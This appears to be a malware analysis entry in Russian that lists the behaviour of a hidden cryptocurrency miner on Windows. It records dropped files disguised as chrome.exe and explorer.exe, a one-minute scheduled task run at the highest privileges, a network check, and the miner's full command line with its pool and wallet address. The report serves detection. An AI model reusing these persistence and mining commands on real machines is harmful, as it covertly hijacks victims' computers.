Техническая информация
- <SYSTEM32>\tasks\google chrome
- %WINDIR%\explorer.exe
- %ALLUSERSPROFILE%\google\chrome.exe
- %TEMP%\winring0x64.sys
- 'ht##bin.org':80
- http://ht##bin.org/ip
- DNS ASK ht##bin.org
- '%ALLUSERSPROFILE%\google\chrome.exe'
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 40 -o pool.hashvault.pro:80 -u 42WhnkabS9rLXX2wKTcJZB3etQPYgvQU3ZAC71QsH3Q9PkEDqS4sCD5azwsPtwPdeLSPXFkWUMSS2hmUsRoPhWaAKcPUyoC -p magic-cpu (со скрытым окном)
- '%ALLUSERSPROFILE%\google\chrome.exe' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "Google Chrome" /rl HIGHEST /tr %ALLUSERSPROFILE%\Google\chrome.exe
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 40 -o pool.hashvault.pro:80 -u 42WhnkabS9rLXX2wKTcJZB3etQPYgvQU3ZAC71QsH3Q9PkEDqS4sCD5azwsPtwPdeLSPXFkWUMSS2hmUsRoPhWaAKcPUyoC -p magic-cpu
- '<SYSTEM32>\taskeng.exe' {41447FEC-053B-462A-9118-2C82223E13B0} S-1-5-21-1960123792-2022915161-3775307078-1001:pebxpodk\user:Interactive:[1]